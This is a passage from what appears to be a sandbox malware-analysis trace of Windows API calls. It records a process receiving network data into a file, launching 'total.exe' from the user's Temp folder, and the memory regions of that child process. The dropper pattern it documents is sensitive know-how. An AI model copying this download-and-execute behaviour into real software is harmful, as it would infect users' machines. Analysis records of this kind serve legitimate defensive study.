lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xd304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xd304, lpOverlapped=0x0) returned 1 [0141.654] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 16060 
[0141.697] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x3ebc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x3ebc, lpOverlapped=0x0) returned 1 [0141.698] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 24820 [0141.699] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x60f4, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x60f4, lpOverlapped=0x0) returned 1 [0141.700] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 26280 [0141.701] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x66a8, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x66a8, lpOverlapped=0x0) returned 1 [0141.702] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 14600 [0141.703] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x3908, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x3908, lpOverlapped=0x0) returned 1 [0141.704] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 8760 [0141.704] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x2238, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x2238, lpOverlapped=0x0) returned 1 [0141.704] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 3472 [0141.708] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 50548 [0141.709] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c78d458, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, 
lpNumberOfBytesWritten=0x1c78d458*=0x1000, lpOverlapped=0x0) returned 1 [0141.709] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee5c0*, nNumberOfBytesToWrite=0xc304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee5c0*, lpNumberOfBytesWritten=0x1c78d4b8*=0xc304, lpOverlapped=0x0) returned 1 [0141.712] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 42340 [0141.712] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xa564, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xa564, lpOverlapped=0x0) returned 1 [0141.717] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 54020 [0141.718] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xd304, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xd304, lpOverlapped=0x0) returned 1 [0141.723] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 64240 [0141.723] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xfaf0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xfaf0, lpOverlapped=0x0) returned 1 [0141.727] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 35040 [0141.727] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x88e0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x88e0, lpOverlapped=0x0) returned 1 [0141.728] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 43800 [0141.754] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xab18, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, 
lpNumberOfBytesWritten=0x1c78d4b8*=0xab18, lpOverlapped=0x0) returned 1 [0141.755] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 52560 [0141.760] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0xcd50, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0xcd50, lpOverlapped=0x0) returned 1 [0141.763] recv (in: s=0x4f8, buf=0x2eee350, len=65536, flags=0 | out: buf=0x2eee350*) returned 39420 [0141.763] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x99fc, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x99fc, lpOverlapped=0x0) returned 1 [0141.766] recv (in: s=0x4f8, buf=0x2eee350, len=31437, flags=0 | out: buf=0x2eee350*) returned 24820 [0141.766] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x60f4, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x60f4, lpOverlapped=0x0) returned 1 [0141.767] recv (in: s=0x4f8, buf=0x2eee350, len=6617, flags=0 | out: buf=0x2eee350*) returned 5840 [0141.767] WriteFile (in: hFile=0x4f4, lpBuffer=0x2eee350*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x1c78d4b8, lpOverlapped=0x0 | out: lpBuffer=0x2eee350*, lpNumberOfBytesWritten=0x1c78d4b8*=0x16d0, lpOverlapped=0x0) returned 1 [0141.767] recv (in: s=0x4f8, buf=0x2eee350, len=777, flags=0 | out: buf=0x2eee350*) returned 777 [0141.924] SetEvent (hEvent=0x3d0) returned 1 [0141.924] WriteFile (in: hFile=0x4f4, lpBuffer=0x2efe368*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x1c78d3d8, lpOverlapped=0x0 | out: lpBuffer=0x2efe368*, lpNumberOfBytesWritten=0x1c78d3d8*=0x309, lpOverlapped=0x0) returned 1 [0141.925] CloseHandle (hObject=0x4f4) returned 1 [0141.964] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.964] GetEnvironmentVariableW (in: 
lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.964] CoTaskMemFree (pv=0x1b869280) [0141.994] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0141.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0141.994] CoTaskMemFree (pv=0x1b869280) [0142.030] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78cb70, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0142.030] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0142.030] SetErrorMode (uMode=0x1) returned 0x1 [0142.030] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78ce50 | out: lpFileInformation=0x1c78ce50*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ed20a30, ftCreationTime.dwHighDateTime=0x1d4406f, ftLastAccessTime.dwLowDateTime=0x5ed20a30, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x5f2a1d10, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0xc9298)) returned 1 [0142.030] SetErrorMode (uMode=0x1) returned 0x1 [0142.031] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78d160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0142.031] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0142.031] SetErrorMode (uMode=0x1) returned 
0x1 [0142.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78d3f0 | out: lpFileInformation=0x1c78d3f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ed20a30, ftCreationTime.dwHighDateTime=0x1d4406f, ftLastAccessTime.dwLowDateTime=0x5ed20a30, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x5f2a1d10, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0xc9298)) returned 1 [0142.032] SetErrorMode (uMode=0x1) returned 0x1 [0142.032] GetLongPathNameW (in: lpszShortPath="C:\\Users\\ADU0VK~1\\", lpszLongPath=0x1c78d0e0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\aDU0VK IWA5kLS\\") returned 0x18 [0142.033] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", nBufferLength=0x105, lpBuffer=0x1c78d160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe", lpFilePart=0x0) returned 0x34 [0142.033] SetErrorMode (uMode=0x1) returned 0x1 [0142.033] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\temp\\total.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c78d370 | out: lpFileInformation=0x1c78d370*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ed20a30, ftCreationTime.dwHighDateTime=0x1d4406f, ftLastAccessTime.dwLowDateTime=0x5ed20a30, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x5f2a1d10, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0xc9298)) returned 1 [0142.033] SetErrorMode (uMode=0x1) returned 0x1 [0142.034] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0142.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.034] 
CoTaskMemFree (pv=0x1b869280) [0142.035] CoTaskMemAlloc (cb=0x104) returned 0x1b869280 [0142.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b869280, nSize=0x80 | out: lpBuffer="") returned 0x0 [0142.036] CoTaskMemFree (pv=0x1b869280) [0142.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0x1c78cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0142.039] SetErrorMode (uMode=0x1) returned 0x1 [0142.039] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c78cfc0 | out: lpFileInformation=0x1c78cfc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0142.039] SetErrorMode (uMode=0x1) returned 0x1 [0142.039] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0x1c78cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0142.040] SetErrorMode (uMode=0x1) returned 0x1 [0142.040] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1c78cfc0 | out: lpFileInformation=0x1c78cfc0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0142.040] SetErrorMode (uMode=0x1) returned 0x1 
[0142.043] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1b83c410 [0142.044] RtlMoveMemory (in: Destination=0x1b83c410, Source=0x2f44c88, Length=0x5e | out: Destination=0x1b83c410) [0142.044] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x1b85cae0 [0142.044] RtlMoveMemory (in: Destination=0x1b85cae0, Source=0x2f4ee88, Length=0x40 | out: Destination=0x1b85cae0) [0142.047] ShellExecuteExW (in: pExecInfo=0x2f4f470*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2f4f470*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", lpParameters=0x0, lpDirectory="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x57c)) returned 1 [0142.123] LocalFree (hMem=0x1b83c410) returned 0x0 [0142.123] LocalFree (hMem=0x1b85cae0) returned 0x0 [0142.124] NtQueryInformationProcess (in: ProcessHandle=0x57c, ProcessInformationClass=0x0, ProcessInformation=0x2f4f530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2f4f530, ReturnLength=0x0) returned 0x0 [0142.125] EnumProcesses (in: lpidProcess=0x2f4f578, cb=0x400, lpcbNeeded=0x1c78d820 | out: lpidProcess=0x2f4f578, lpcbNeeded=0x1c78d820) returned 1 [0148.575] SetEvent (hEvent=0x330) returned 1 [0148.575] SetEvent (hEvent=0x304) returned 1 [0148.575] SetEvent (hEvent=0x308) returned 1 [0148.575] SetEvent (hEvent=0x320) returned 1 [0148.575] SetEvent (hEvent=0x340) returned 1 [0148.575] SetEvent (hEvent=0x334) returned 1 [0148.575] SetEvent (hEvent=0x338) returned 1 [0148.575] SetEvent (hEvent=0x33c) returned 1 [0148.575] SetEvent (hEvent=0x344) returned 1 [0148.576] CoWaitForMultipleHandles 
(in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1c78ef18*=0x39c, lpdwindex=0x1c78ec30 | out: lpdwindex=0x1c78ec30) returned 0x0 [0149.861] VirtualQuery (in: lpAddress=0x1c78db30, lpBuffer=0x1c78e9f0, dwLength=0x30 | out: lpBuffer=0x1c78e9f0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0149.862] VirtualQuery (in: lpAddress=0x1c78dde0, lpBuffer=0x1c78eca0, dwLength=0x30 | out: lpBuffer=0x1c78eca0*(BaseAddress=0x1c78d000, AllocationBase=0x1be00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0149.869] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x1c78e3e0*=0x570, lpdwindex=0x1c78e110 | out: lpdwindex=0x1c78e110) returned 0x0 [0149.869] SetEvent (hEvent=0x52c) returned 1 [0149.869] SetEvent (hEvent=0x570) returned 1 [0149.869] SetEvent (hEvent=0x580) returned 1 [0149.869] SetEvent (hEvent=0x52c) returned 1 [0149.869] SetEvent (hEvent=0x570) returned 1 [0149.869] SetEvent (hEvent=0x590) returned 1 [0149.869] SetEvent (hEvent=0x584) returned 1 [0149.869] SetEvent (hEvent=0x588) returned 1 [0149.869] SetEvent (hEvent=0x58c) returned 1 [0149.870] SetEvent (hEvent=0x594) returned 1 [0149.870] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1c78ef18*=0x39c, lpdwindex=0x1c78ec30 | out: lpdwindex=0x1c78ec30) returned 0x0 [0151.837] CoGetContextToken (in: pToken=0x1c78f8b0 | out: pToken=0x1c78f8b0) returned 0x0 [0151.841] CoUninitialize () Thread: id = 50 os_tid = 0x820 Thread: id = 51 os_tid = 0x81c Thread: id = 52 os_tid = 0x5c8 Thread: id = 53 os_tid = 0x68c [0140.871] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0140.875] ResetEvent (hEvent=0x3d0) returned 1 Process: id = "4" image_name = "total.exe" filename = 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" page_root = "0x4cd00000" os_pid = "0x4c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xbf8" cmd_line = "\"C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe\" " cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 891 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 892 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 893 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 894 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 895 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 896 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 897 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 898 start_va = 0x400000 end_va = 0x439fff entry_point = 0x400000 region_type = mapped_file name 
= "total.exe" filename = "\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") Region: id = 899 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 900 start_va = 0x77d30000 end_va = 0x77eaffff entry_point = 0x77d30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 901 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 902 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 903 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 904 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 905 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 906 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 907 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 908 start_va = 0x200000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 909 start_va = 0x755d0000 end_va = 0x755d7fff entry_point = 0x755d0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: 
"c:\\windows\\system32\\wow64cpu.dll") Region: id = 910 start_va = 0x755e0000 end_va = 0x7563bfff entry_point = 0x755e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 911 start_va = 0x75640000 end_va = 0x7567efff entry_point = 0x75640000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 912 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 913 start_va = 0x75a10000 end_va = 0x75a55fff entry_point = 0x75a10000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 914 start_va = 0x75c90000 end_va = 0x75d9ffff entry_point = 0x75c90000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 915 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x0 region_type = private name = "private_0x0000000077930000" filename = "" Region: id = 916 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x0 region_type = private name = "private_0x0000000077a50000" filename = "" Region: id = 917 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 918 start_va = 0x440000 end_va = 0x4a6fff entry_point = 0x440000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 919 start_va = 0x75140000 end_va = 0x751c3fff entry_point = 0x75140000 region_type = mapped_file name = "comctl32.dll" filename = 
"\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 920 start_va = 0x75880000 end_va = 0x7588bfff entry_point = 0x75880000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 921 start_va = 0x75890000 end_va = 0x758effff entry_point = 0x75890000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 922 start_va = 0x75920000 end_va = 0x75976fff entry_point = 0x75920000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 923 start_va = 0x75a60000 end_va = 0x75bbbfff entry_point = 0x75a60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 924 start_va = 0x75bc0000 end_va = 0x75c6bfff entry_point = 0x75bc0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 925 start_va = 0x75f20000 end_va = 0x7600ffff entry_point = 0x75f20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 926 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x76650000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 927 start_va = 0x76780000 end_va = 0x7687ffff entry_point = 0x76780000 region_type = mapped_file name = "user32.dll" 
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 928 start_va = 0x76880000 end_va = 0x774c9fff entry_point = 0x76880000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 929 start_va = 0x774d0000 end_va = 0x7756cfff entry_point = 0x774d0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 930 start_va = 0x77600000 end_va = 0x7768ffff entry_point = 0x77600000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 931 start_va = 0x777f0000 end_va = 0x77808fff entry_point = 0x777f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 932 start_va = 0x77d00000 end_va = 0x77d09fff entry_point = 0x77d00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 933 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 934 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 935 start_va = 0x4b0000 end_va = 0x637fff entry_point = 0x0 region_type = pagefile_backed name = 